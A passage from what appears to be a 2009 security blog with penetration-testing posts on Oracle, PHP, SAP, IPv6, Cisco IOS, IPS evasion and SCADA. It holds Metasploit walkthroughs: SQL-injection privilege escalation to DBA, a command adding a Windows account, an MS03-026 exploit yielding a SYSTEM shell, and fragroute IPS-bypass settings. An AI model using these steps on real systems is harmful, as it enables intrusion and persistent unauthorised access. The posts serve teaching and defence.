[*] Identified SID for 192.168.0.105: PLSExtProc
[*] Identified SID for 192.168.0.105: cyxt
[*] Identified SERVICE_NAME for 192.168.0.105: PLSExtProc
[*] Identified SERVICE_NAME for 192.168.0.105: cyxt
[*] Identified SERVICE_NAME for 192.168.0.105: cyxtXDB
[*] Auxiliary module execution completed

Bruteforce Method

msf auxiliary(sid_brute) > run
[*] Starting brute force on 192.168.0.103, using sids
from /home/bt/msf3/dev/data/exploits/sid.txt...
[*] Found SID 'ORCL' for host 192.168.0.103
[*] Auxiliary module execution completed

Apart from guessing and bruteforcing, we can also use different Oracle components to determine the SID. Such as, oracle servlets and web applications.

3. Bruteforce Attack
Using a standard or extended password list, one can bruteforce various combinations of usernames and passwords.

msf auxiliary(brute_login) > run

[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[*] Auxiliary module execution completed
msf auxiliary(brute_login) > db_notes
[*] Time: Sat May 30 08:44:09 -0500 2009 Note: host=172.10.1.109
type=BRUTEFORCED_ACCOUNT data=SCOTT/TIGER

4. Injection Attack & Privilege Exploitation

msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > info
Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$
Provided by: MC
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SQL GRANT DBA TO SCOTT yes no SQL to run.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will escalate a Oracle DB user to DBA by exploiting an
sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(dbms_export_extension) > set SID UNLUCKY
SID => UNLUCKY
msf auxiliary(dbms_export_extension) > run

[*] Sending package...
[*] Done...
[*] Sending body...
[*] Done...
[*] Sending declare...
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(dbms_export_extension) >

msf auxiliary(oracle_sql) > set SQL select * from user_role_privs
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run
[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*]SCOTT,DBA,NO,YES,NO<--New Privileges :-) [*] SCOTT,RESOURCE,NO,YES,NO [*] Done... [*] Auxiliary module execution completed msf auxiliary(oracle_sql) >

5. Post Exploitation

msf auxiliary(win32exec) > set CMD "net user dba P@ssW0rd /add“
CMD => net user dba P@ssW0rd1234 /add
msf auxiliary(win32exec) > run
[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'net user dba P@ssW0rd /add‘
[*] Done...
[*] Auxiliary module execution completed

These set of steps give us a clear view of exploiting the Oracle infrastucture following similar or other modified Penetration Testing methodology. Thus, it is quite important for security professionals to understand and correlate the ideal testing methods to derive the requirements for Oracle platform security.

Escalating from PHP Hardend Environment

2009-08-31T19:04:00.004-04:30

There are number of PHP threats and vulnerabilities which have been reported during the past few years. These include, file inclusion attacks, remote file upload vulnerability, insecure function injection (eval,create_function,preg_replace), etc. Executing malicious shellcode over vulnerable web servers is still easier but it is quiet challenging when "post exploitation" topic is highlighted.

Today many of PHP-based web servers are hardened by default and running with low privileges. Thus, it is extremely challenging for the attacker to gain full control over the server. Let's take a brief overview on common type of protection schemes used to hardened PHP environment:

1. Limit the PHP code (i.e. control each input/output)
2. Limit the PHP interpreter
3. Harden the code against buffer overflow + memory corruption
4. Limit the possibility of arbitrary code execution
5. Non-writable filesystem
6. safe_mode (disable access to configuration settings, limit access to files/directories, limit environmental variables)
7. disable_function/disable_classes (remove un-necessary functions and classes)
8. Use memory manager (malloc/mmap) to apply safe_unlink feature and three canaries (metadata,buffer(before/after)
9. Kernel-level protection with ASLR (address space layout randomization), mprotect(), Apparmor, SELinux, GRSecurity

Now take some highlights on PHP vulnerabilities and exploitable condition:

1. Caller of the PHP application can force parameter to be passed by reference

function increase($a)
{
$a++;
}
$z = 7;
// pass $z as a reference
increase(&$z);
echo $z,"\n";
?>

This happens because we are unable to disabled the internal "allow_call_time_pass_by_reference" function.

2. executor_globals() to find the interesting target, it contains list of functions/ini entries/jmp_buf but the memory position is unknown and
it changes the structure with every single PHP version.

3. To execute the user choice of code, function dl() comes in handy but it requires:
-platform independent library
-a writable directory
-enable_dl should be activated
-setting extension_dir to the shared library directory

4. Attacking under x86 linux platform:
-PHP array leaks the pDestructor pointer which points to PHP code segment
-scan until we find ELF header in memory
-once ELF header discovered, we can also find imported functions
-select the function which have been imported from libc (memcpy)
-from there we can look any function within libc and access their addresses
-address to shellcode can be written and executed
-copying shellcode into the writable text-segment and execute it

Cloud Computing: A Security Outlook

2009-08-26T12:48:00.005-04:30

A 'cloud' in computing environment is the combination of Infrastructure as a service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS) components. Well, most of us may confuse it with ASP (Application Service Provisioning) strategy, which is completely wrong. In simple terms, cloud is a virtualized, dynamically scalable, shared fabric and shared hardware solution to the users. It avoids capital expenditure (CapEx) on purchasing expensive hardware, software and other services by renting the usage from a third-party provider under SLA (Service-level Agreement). For more information, a cloud taxonomy is attached below.

When taking insights of security within Cloud Computing domain give a clear view of risks involved from consistency, interoperability, confidentiality, availability and integrity point of view, such as:

-Host visibility within cloud
-Trust Exploitation
-Data Privacy issues
-Immature logging process
-Data center tripwire
-Application security vulnerabilities
-Backdoored filesystem/virtualized operating systems/applications
-Virtualization security issues
-Content ownership/Intellectual property rights
-Cleartext data storage and transfer vs SSL/EV-SSL
-Use of weak encryption technology
-Centralized approach

Hence, before approaching any cloud computing vendor its better to investigate their policies and procedures regarding security of your company's data transactions. This can be analyzed on the following basis:

-Data segregation and use of strong encryption technology
-Data hosting location
-Recognized under industry standards and regulatory compliance.
-Disaster recovery and business continuity assurance
-Privileged access control
-Availability of resources and data
-Viability of data in case if the vendor goes out of business

A good set of cloud service can be differentiated under agility, sustainability, cost, multi-tenancy, reliability, scalability and security. Additionally, from security perspective, a 'focused penetration testing' may rest assure a vendor from any false sense of security and thus save the cost of any data loss or liability issues.

For more information on current security initiatives, visit:
[1]Cloud Security Alliance - http://www.cloudsecurityalliance.org
[2]ENISA Cloud Security Working Group - http://www.enisa.europa.eu

Exploiting SAP Business Platforms: The Pen-Testing Analysis

2009-08-19T12:56:00.005-04:30

SAP simply stands for "Systems, Applications and Products in data processing". SAP as a unique business solution developer integrates range of solutions including ERP, CRM, GRC, PLM, SCM and many more. The ease of usage, implementation and market reputation has put forward a strong basis for the company (german based) worldwide. Deploying SAP solution is a bit lengthy and complex process and that's why a core security settings left default or unattended. This could results in serious exposure of the SAP platforms and flag a high risk to the organization.

SAP Basic Components

ClientID - Business unit or Corporation with unique identifier.
Transaction - A conversation between client interface and backend database.
Authorization - Users assigned roles/profiles.
ABAP - SAP high-level programming language.
Reports - A component to generate report on user requests.
Functional Modules - A set of remote or local procedures.
RFC Interface - Remote funtion call library.

SAP Security

Talking in the specific context of SAP platform, many auditors would like to harden the SAP authorization subsystem (roles and profiles). While hardening the authorization process and segregation of duties is considered vital but there is also another aspect of security which involves technical assessment of all the networked components within SAP environment. Conducting "Penetration Testing" using industry-proven methodology gives more clear outlook for security vulnerabilities and threats in the existing infrastructure. Such as, weakness in configuration may result in business frauds. The typical number of steps followed under SAP Pen-Testing are:

-Discovery (Find the target)
-Enumeration (Services running on the platform)
-Vulnerability Assessment (Check for the presence of known/unknown vulnerabilities)
-Exploitation (Try to gain administrator privileges on the defined system)

The main goal is to achieve the highest possible privileges in the production environment which can be accomplished by:

-Getting SAP Administration access
-DBA privileges
-SAP_ALL access privileges

Though obtaining any of the above access may give complete control over SAP systems.

SAP Penetration Toolkit

Following are some of the key tools necessary to assess the SAP infrastructure.

-NMap
-rsh,rlogin,rexec
-BurbSuite
-W3af
-Nessus
-JTR (John The Ripper)
-THC Hydra
-SQL Client Tools
-NFS Client Tools
-Sapyto
-Metasploit

It worth to mention that "Sapyto" is specially designed as SAP Penetration Testing Framework to cover all aspects of Pen-Testing methodology. And because it is developed in python and C, it is easier port plugins.

Countermeasures

1.Restrict connections to the SAP gateway.
2.Restrict access to shared resources. Such that, allow only internal connections.
3.Harden the configuration settings.
4.Remove/Change the default user accounts.
5.Enable "SNC" to protect against evasdropping.
6.Good password security should be enforced.
7.Access to transactions should be restricted.
8.Use SAP authorization object "S_Program" to protect report confidentiality.

Exploiting IPv6 Network Stack: A Pen-tester Approach

2009-08-11T05:37:00.004-04:30

The Next-generation protocol, IP version 6, has came out nearly 11 years ago but never been used or practiced in the real world network envrionment. This lack of adoption of technology has not only left many machines in corporate networks without IPv6 implementation but also put a negative affect on networking and operating system vendors. On the other side, due to its fast growth and complexity of implementation in various firewalls and intrusion detection/prevention appliances has revealed the attack surface, as they cannot block malicious IPv6 traffic. The main purpose of this article is to demonstrate the process through which a penetration tester can assess the security of IPv6 enabled environment.

Addressing Scheme

The representation of IPv6 has changed alot from IPv4 addressing scheme. IPv6 network address consists of 128 bits or 16 bytes as a pair of four hex-digits separated by colons. This gives more wider address space and flexibility to segment the addresses accordingly. Lets take some examples to understand the inner workings of IPv6 addressing.

::1 represents loopback or localhost address (IPv4 equivalent 127.0.0.1)
::0 or :: represents ANY IPv6 address
fe80:: prefix represents link-local address
2000:: prefix represents site-local address

Attack Surface

Usually all the IPv6 network nodes are configured with at least one link-local address (fe80::). While performing this automatic configuration, a router discovery request will be sent to all IPv6 enabled routers on their broadcast addresses. Now, if any router respond back, the node will select that site-local address (2000::) for its interface. This scenario introduces a threat where there is no active IPv6 routers and the attacker takes advantage to reply with rogue address. The risk factor of such attack is higher and may cause serious damage and data leakage problems for the organization. Using the mentioned scenario, I will demonstrate the real-world attack on IPv6 network from penetration testing perspective.

1. IPv6 Network Configuration
To validate if your system is configured with IPv6 address at particular interface, execute the following command:

# ifconfig eth0 | grep inet6
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link

2. Discovery and Scanning

IPv6 design introduces a new set of protocol for network discovery. It consists of ICMPv6 Neighbour Discovery and Neighbour Solicitation protocols. In order to enumerate the network hosts, we can use the "IPv6 Attack Toolkit" published by Van Hauser. This task is accomplished using "alive6" program included in the package.

# alive6 eth0
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
Found 2 systems alive

The combination of "ip" and "ping6" command can also accumulate in local IPv6 node discovery process.

# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
# ip neigh | grep ^fe80
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE

3. Service Enumeration

In order to find the open ports running specific services on target IPv6 machine. An attacker can simply use "NMap" as follows:

# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT
PORT STATE SERVICE
22/tcp open ssh

The similar task can be done through Metasploit Framework's TCP port scanner which includes a complete support for IPv6 addresses.

# msfconsole
msf> use auxiliary/discovery/portscan/tcp
msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0
msf auxiliary(tcp) > set PORTSTART 1
msf auxiliary(tcp) > set PORTSTOP 10000
msf auxiliary(tcp) > run
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027
[*] Auxiliary module execution completed

4. Exploitation

To move towards penetration stage, it is vital to determine all set of vulnerable services running on the target machine. For instance, consider the following NMap results from scanning the IPv6 Windows interface.

# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
554/tcp open rtsp
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1032/tcp open iad3
1034/tcp open unknown
1035/tcp open unknown
1036/tcp open unknown
1755/tcp open wms
9464/tcp open unknown

As we know that Metasploit Framework supports IPv6 sockets. This allow us to use almost any auxiliary and exploit modules against IPv6 hosts same as IPv4. For the purpose of demonstration, I have used MS03-036 (Blaster) exploit to penetrate DCERPC endpoint mapper service (port 135) and get a root shell.

msf> use windows/exploit/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
msf exploit(ms03_026_dcom) > set LPORT 4444
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

References:

THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
The Metasploit Framework - http://metasploit.com
nmap - http://nmap.org/
IPv6 Site - http://www.ipv6.org/
RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt

Securing Application Infrastructure: The analysis of Application Security Methodologies

2009-07-27T00:18:00.005-04:30

The trend of security threats has recently gained a prominent attention in media and industry reports. This article will briefly examine the methodologies and approaches that most organizations follow to address security issues by giving examples, test cases, strengths and weaknesses. Today's widely known solutions involve vulnerability scanning, static code analysis, penetration testing, binary analysis, fuzzing etc. Which of them are more or less reliable and which of them can address specific type of application problems, is mainly discussed here.

As many software vendors think that 'security issues' may never laid them out of business but in reality it does affect the sales as well as market reputation. Deploying proper application security not only rest assure the clients but also lead to increase the productivity. Let us take an example of interesting equation:

X=Applications developed
Y=Vulnerabilities exist in those applications
Z=Cost of repair (patch and fixes)
Now; X.Y.Z=A (answer)

If 'A' is less than the cost of third-party QA auditor, cost of training the developers and conducting additional security audits then it make more sense to write an insecure code.

Application vulnerabilities (in broad sense) can be divided into following sections but not limited to:

Operation/Platform Vulnerabilities
-Asset information disclosure
-Buffer Overflows
-Misconfigurations
-Error Handling
-Resource specific threats

Design Vulnerabilities
-Logic Flaws
-Access Control (Authentication/Authorization

Implementation Vulnerabilities
-Code Injection
-Information Disclosure
-Command Execution
-Functionality Abuse
-Input Validation
-Time and State

Now to test the security of the application, one may apply either of these methodologies:

Automated
-Automated Dynamic Tests (Fuzz Testing, Vulnerability Scanning)
-Automated Static Tests (Source or Binary Code Scanning)

Manual
-Manual Dynamic Tests (Parameter Tampering and Social Engineering)
-Manual Static Tests (Source or Binary Code Auditing)

Although each of these methods have their own strengths and weaknesses. Thus, we assume not the best, but atleast more efficient and reliable method can be judged by looking into their specific testing process.

Automated Dynamic Testing
While approaching to disclose application vulnerabilities under this method, the complexity ratio increases when moving from vulnerability scanning to the fuzz testing.

Strengths
-Less false positives (inherent benefits of run-time analysis)
-Programmatic approach to ensure reliable and consistent tests output

Weaknesses
-Threat assurance, No Fault != No Flaw
-Only the part of code audit may provide baseline for measurement.
-Unexpected conditions cannot be tested without additional programming.

Use Cases
-Fuzz Testing (complex input, informal SDLC, observable indicators)
-Application Scanning (strongly typed flaw classes, deterministic and observable behavior, known inputs only)
-Vulnerability Scanning (known transaction sequences, one to one mapping of triggers to specific conditions)

Automated Static Testing
This method can disclose the set of vulnerabilities present in the application by examining the code (source/binary) without user interaction. Several commercial and open source tools are available to perform automated static analysis. The complexity of such tools increases from normal flaw identification to the formal verification process.

Strengths
-Assessment of low-context flaws (parameters, DB query statements, etc)
-Automated scans required little or no human interaction
-Can get good placement during development lifecycle

Weaknesses
-Applications without presence of their source code.
-High ratio in false postives or negatives, tuning is harder.
-Critical issues with formal verification

Developing and correctly expressing a set of security invariants.
Developing an interpretation of the application that lends itself to proving/disproving invariants.

Use Cases
-Timely and resource-specific detection of simple flaws
-Detection of regression as a part of development lifecycle
-False assumption on strong assurance of the critical application
-In the hands of a developer who cannot interpret or filter the results correctly

Manual Dynamic Testing
The manual dynamic assessment apporach can be achieved by human-navigated application usage followed by assurance validation process and fuzz testing. A critical background information on application design can be provided by the developers. The complexity of manual dynamic testing process increases with its level of common criteria, assurance validation to parameter tampering.

Strengths
-Parallel capacity in execution of tests
-Pattern recognition
-Testing the live implementation may reduce false positives
-Capable of emulating the malicious attack process

Weaknesses
-Time consuming for large and complex applications
-May require the tester to hold a steep learning curve
-Test envrionment may not mirror production

Use Cases
-High risk applications require highly experienced security auditor to understand and scope the attack surface
-Wrong application type or the wrong tester background
-A case where the requirements of assessment does not match the expected risk profile of an application

Manual Static Testing
This process involves the interaction of human reviews, understanding application design and architecture documentation, use of offline toolset (such as, disassemblers, code browsers, etc).

Strengths
-Known data and code points
-Without any resource specific considerations
-Adaptability with skills and toolset

Weaknesses
-Accuracy issues (falst positives, human mistakes)
-High resource requirements
-Inconsistency in interpretation of same flaw in different ways

Use Cases
-Manual code audit (skilled resources, minor findings before automated tests, custom-coded scripts)
-Configuration review (low risk in changing values at runtime, known data sources and formatings)

Thus, from the application security assessment methods mentioned above and the statistics from "WASC Statistics Project" prove that the probability in detection of high risk vulnerabilities can be higher if combined set of methodologies are used. And this combined approach is almost 12.5% higher than automated scanning (specific to web applications).

Cisco IOS: The Geometry of varying Threats

2009-07-12T12:27:00.008-04:30

Cisco as a leader in networking market has laid several routing platforms which are being used all over the world. These devices have been a part of internet core, government organizations, service providers and corporate networks for a decade. These all devices basically run the same operating system called "Cisco IOS". Cisco IOS is a monolithic operating system which relies on 3-dimensional complexity, such as, platform dependent code, feature-set dependency and major or minor version dependent code. It is compiled as a single ELF binary and runs directly from CPU. No virtual memory allocated per process, interrupt driven handling for the critical events
and global data structures support.

Now, taking a glance at security issues highlight that IOS is written in plain 'C' language, sharing same address space for transactions, heap, data structures and pointers. From technical point, everything present in IOS can be the prime target for remote code execution exploits from kernel context. Lets take some examples and real-world scenarios available in the public domain.

IOS rootkits
Binary Modification Rootkits
This is a similar type of other available rootkits and their major function is to modify the binary code to implement the backdoor and allow unauthorized access for malicious adversary. There are three types of binary modifications:
1. Image Modification
2. Runtime Patching
3. Boot Patching

TCL Backdoors
As we know that Cisco IOS supports TCL interpreter, such that, a small TCL script can be used to bind an open TCP port for the backdoor connection.

Revealing IOS Rootkits
Flash File System
Obtain a copy of the modified IOS image placed on the flash of the router or on FTP/TFTP. This can be checked further for integrity using MD5 sum from known good sources.

Router# show flash
Router# copy flash:cxxx0-ipbase-mz.124-11.T.bin ftp

NVRAM
Knowing the configuration changes written to NVRAM can help investigator to reveal the security incident.

Router# show startup-config

IOS Exploits
There are several exploits published in the public domain. They can found at the following links:

-IOS TFTP server heap overflow exploit
(http://cir.recurity.com/wiki/PhenoelitTFTP.ashx)
-IOS OSPF neighbor array overflow exploit
(http://cir.recurity.com/wiki/PhenoelitOspf.ashx)
-IOS HTTP server URL length integer overflow exploit (http://cir.recurity.com/wiki/PhenoelitHttp.ashx)
-IOS FTP server MKD command overflow exploit (http://cir.recurity.com/wiki/AndyDavisFTP.ashx)
-IOS VTP missing details DoS
(http://cir.recurity.com/wiki/ShowRunVTP.ashx)
-Shellcode that attempts to find IOS functions to execute (http://seclists.org/fulldisclosure/2008/Aug/0408.html)
-Password protected bind shell (http://www.irmplc.com/downloads/presentations/IOS_Bindshell_v.1.0.txt)
-Connect Back Shell (http://www.irmplc.com/downloads/presentations/IOS_Connectback_v.1.0.txt)
-Two byte overwrite bind shell (http://www.irmplc.com/downloads/presentations/IOS_tiny_v.1.0.txt)

Detection of Exploitation
Using the following set of commands can help forensic analyst to find out any post-exploitation reaction as an evidence.

show version
show clock detail
show running-config
show startup-config
show reload
show ip route
show ip arp
show users
show logging
show ip interface
show interfaces
show tcp brief all
show ip sockets
show ip nat translations verbose
show ip cache flow
show ip cef
show snmp user
show snmp group

References
http://cir.recurity.com
http://www.cisco.com/warp/public/707/cisco-sr-20080516-rootkits.shtml
http://www.cisco.com/web/tsweb/psirt/cisco-sr-20080516-rootkits.zip
http://addxorrol.blogspot.com/2007/01/one-of-most-amusing-new-features-of.html
http://seclists.org/fulldisclosure/2008/Aug/0264.html
http://www.phrack.org/issues.html?issue=60&id=7

Log Centralization, Analysis and Visualization

2009-06-30T17:51:00.003-04:30

Although many of us have seen IT companies securing the logs in one centralized location but in one or two they lack visualization in time of incident handling or analysis process. This could raise a serious bar from legal and corporate image perspectives. SEIM (Security event information management) systems can help to resolve these issues but logging, correlation and visualizing from distributed networks has always been challanging.

As we can see that different souces interacting with muliple devices at specific levels to pass the network traffic. The ratio of such typical network to generate logs would be moderate-high. So, why is it log centralization is considered necessary? From my experience, it is because of easy accessibility, searchability, log categorization, identification, correlation and redundancy. While talking about securing architecture of log management, virtualization concepts put the step forward mostly in data centers and hosting farms. The typical architecture looks as below:

{Sources -> Generate Logs -> Virtualization (analyzing, disposing logs) -> Log Management (storing, analyzing logs)}

The typical challanges to this architecture involves balancing the quantity of log management resources, policies and procedures, continuous monitoring of log data, log categorization and access control. On the otherside when considering the visualization, DAVIX Live CD contains some of the useful tools and scripts which make it easier to process data and visualize them to track the incidents.

References:
http://davix.secviz.org
http://www.wallinfire.net/picviz
http://www.vizsec.org
http://www.splunk.com

Bypassing IPS: A Penetration Tester Perspective

2009-06-27T17:53:00.010-04:30

IPS (Intrusion Prevention System) technology was designed to cover the shortcomings of the IDS systems. In technical words, it will not only detect but also prevent the malicious packets from entering the secure zone on your network. Basic firewalls are just capable of scanning and examining the headers of the packet but IPS also inspect the payload inside it. Intrusion prevention system manages a deep packet inspection (DPI) technology to conduct its tests against protocol headers and payloads by gathering more information on attack patterns,
anomalous behavior and controlling the network traffic intelligently. The basic IPS deployment can be done using an open source tools, such as, Snort Inline + IPTables. With this kind of basic configuration, a security administrator would be able to capture malicious packet (snort_inline) and block(IPTables) that sequential traffic from reaching vulnerable host.

Now lets take a look on evasion technique used to bypass these intrusion prevention systems. As we know that there are several IPS vendors in the market today, such as;

- Cisco
- 3Com
- Cyberoam
- Fortinet
- Checkpoint
- Sourcefire
- IBM
- Third Brigade
- eEye
- Juniper
- Radware
- TippingPoint
- ForeScout
- IntruPro
- StoneGate
- DeepNines
- Enterasys

and others...

These vendors design the IPS technology in different ways but their basic approach of stopping the bad network packets remain similar. Holding a strong knowledge of TCP/IP, an attacker can easily manage to bypass the IPS and deliver the malicious packets destined for the vulnerable host. The technique is known "Packet Fragmentation". However, this is an old method but still useful to bypass some of the vendors IPS. The task to generate and route the malicious packets can be accomplished using 'Fragroute' tool. 'NMap' can do the similar stuff using '-f' option.
Recently, while conducting the penetration testing, I found that the DMZ network was protected with an IPS. Although I am not going to disclose the vendor name, but I will explain the method I used to approach the web application server with malicious SQL/XSS query. However, it should be noted that not all vendors are vulnerable to these specific attacks.

Fragroute
This tool helps the pentester to intercept, modify and rewrite the egress traffic according to the rules defined in the configuration file. By simply modifying the configuration file located at '/etc/fragroute.conf' with the following values:
tcp_seg 24 ip_frag 64 tcp_chaff paws print

This modification will help segmentation of TCP data into forward overlapping 24-byte segments, dervie the 64-byte fragments, interleave with overwriting, random chaff segments holding older timestamps for PAWS elimination and print the output. Fragroute has changed the sequence of the traffic generated and directed them from my attacking machine to the vulnerable host bypassing the IPS. It is recommended that these variable-set should be tested in the controlled environment before applying them for the live network.

The network layout was simple, {Attacker<-->(Fragroute)-->Internet-->IPS-->Webserver}

Its worth noticing that we dont need to use the local proxy to browse the remote web application (true for many web applications auditing tools). So, just browsing and injecting the application with SQL and XSS queries worked very well this time. Another technique can be used in conjunction with fragroute is gzip encoding for evasion purposes.

Problems with IPS
Two major problems should be outlined when we talk about IPS deployment.
-False Positives (need the exact signatures)
-Performance (Latency issues, such that in VoIP network it not acceptable at all)
-Evasion (A simple obfuscation of detectable traffic pattern can make its way through)

However, if we create a conceptual picture of the above mentioned problems. They can only be the reasons because of cost, physical limitations or any specific network envrionment. A small perl based script 'IPSTester.pl' from "iv2-technologies.com" can help to assess these IPS systems for their limitations.

Industrial Hacks, Controlling and Securing SCADA Systems

2009-06-06T19:09:00.005-04:30

SCADA, the Supervisory Control and Data Acquisition system is a software application used to control the process, monitor and gather the real-time data from remote devices in order to manage any hazardous conditions. Its application is widely applied in telecommunication, transportation, oil and gas industry, defense systems, water and waste control systems and power plants. Process controlling and monitoring can be categorized as industrial, infrastructure or facility.

Looking from the security perspective of these systems govern the major vulnerabilities and threats that can easily be exploited by malicious adversaries. For a decade, number of legacy IT tools have been developed for scanning and assessing the SCADA systems security. Number of incidents reported in past have proved the inconsistency of these systems, such that, on 10-June-1999 an "Olympic Pipe Line" company faced the rupture and release of gasoline causing damages of at least $45m and life of several people.

For more information:
http://www.cob.org/services/environment/restoration/olympic-pipeline-incident.aspx

Number of security problems discovered while investigating these kind of incidents range under
application response delay, system fault in shutdown and isolation process and various security vulnerabilities such as blank password access on compressor station. SCADA systems basically carry the operations which always hold real-time communication. Many of these systems are deployed without anti-virus to maintain the performance and scability. But at the same time, they are vulnerable to viruses and worms. One such incidents has been reported in 2003 at Davis-Besse Nuclear Power Plant, Ohio, infecting the whole network with Slammer worm and disabled the safety monitoring system. Employing security policies and procedures can remove such gaps from SCADA based network but changing them often is a nightmare.

Penetration Testing for the SCADA Systems
To assess the security of these systems, a traditional approach of Penetration Testing can be used to conduct the assessment in order to assure the SCADA network security. From my past experience in assessing the SCADA application and network, it is vital to defense such network at perimeter level (DMZ, IDS/IPS, Firewalls). Researchers from different security groups has revealed serious security issues in default SCADA system, such as:

-No Data encryption
-No Authentication or Blank Password
-No Integrity statement
-Network Traffic in clear text
-Default system/network configurations
-No backup strategies
-RAS/VPN access without proper security policies
-Physical security

Although the deployment of IT and SCADA system envrionment has similarity but the differences can be measured and the reliable security assessment approach can be done. Major security compliances that could help in achieving this goal include, BS7799, ISO15408, NIST-SPPICS, ISA S.99.1 and CIDX-VAM. Following the similar security approach from IT systems envrionment can help to integrate and preserve the CIA (confidentiality, integrity and availability) for SCADA systems.

Generally speaking, the SCADA Penetration Testing process involve:
-Identification
-Fingerprinting
-Vulnerability Mapping
-Exploitation
-Control

The major assessment tools remain same with an exception to modify the methodology of performing pen-testing against the SCADA envrionment as compared to the IT network. Tools like nmap, nessus, wireshark and metasploit play a key role in assessing the security posture of the organization's infrastructure. Custom scripts and fuzzers (SPIKE, LZfuzz) can also provide aid in assessing the SCADA applications.

Additional Resources:
CrISTAL Project: http://cristal.recursiva.org
ModScan: http://code.google.com/p/modscan
ScadaSafe: http://scadasafe.sourceforge.net
SMART: http://safemap.sourceforge.net

Cisco IOS IPS Testing with Nmap Scan

2009-04-26T20:42:00.018-04:30

When you are implementing a system on the network, you always perform testing (security, performance, etc.) before it makes an attacker to do so. The aim of this paper is to make a short introduction on one of these tests to be performed prior to the production envrionment we are going to implement.

To benefit from the Cisco routers, I will implement the solution that co-ordinates number of models under Cisco IOS Intrusion Prevention System (IPS).

According to Cisco:

“Cisco IOS Intrusion Prevention System (IPS) provides an inline, deep-packet inspection feature that effectively mitigates a wide range of network attacks.”

Platforms that support this feature are:
Family 800: 871, 876, 877, 878, 881, 887, 888

Family 1800: 1801, 1802, 1803, 1811, 1812, 1841, 1861

Family 2800: 2801, 2811, 2821, 2851

Family 3800: 3825,3845

Family SR520: SR520

Family 7200: 7204VXR, 7206VXR

Family 7301: 7301

Note: As of last May 2008 platforms Cisco recommends upgrading to a version of IOS 12.4 (11) T2 or later, to be compatible with the new signature system 5.x.

If you want to update the signatures, follow the link below:

http://www.cisco.com/pcgi-bin/tablebuild.pl/ios-v5sigup (requires CCO login).

For those managers who are starting in the world of Cisco Security, I have seen that many people like to use a tool, Security Device Manager (SDM). And I think that if this is the first time you are going to deploy such solution it is better to undertake the use of such tool in order avoid confusion instead trying via CLI.

The audience for this paper could be network administrators with basic knowledge of networking, TCP/IP protocol, CCNA Security or equivalent. I will the part of installing SDM and the normal router settings but in case if you need it, please drop me an e-mail.

Here is the scenario:

As in the laboratory environment, we asume that the network segment is 192.168.100.0/24 and has access to the public internet.

Launching Backtrack to do the scans against NAT-IP of a router, can be performed as:

Nmap –PN –O –sV –v –sS 192.168.100.10

The results are similar to the following image:

Look at the log of IOS IPS:

The above log shows:

1. Number of Signatures (Sigs) such as: 2004, 3040, 3041, 3042.

2. Display the type of packets: ICMP Echo Req (ping), TCP SYN / FIN, etc

3. The IP source and destination

Using the NMap option “decoy -D”, we try to conceal the attacker's IP with the fake ip addresses, and the results from IPS are shown in the figure below:

Looking at the log, it appears that the alerts are generated with the same number of signatures to the previous image but with different IP addresses (i.e. attacker). While the log shows the number of signatures it matches the SDM and choose an action to be taken in addition to the default which is: “Alarm”. For example, we choose the signature 3040 and add a DROP action.

After applying the changes, run NMap and look at the results shown below:

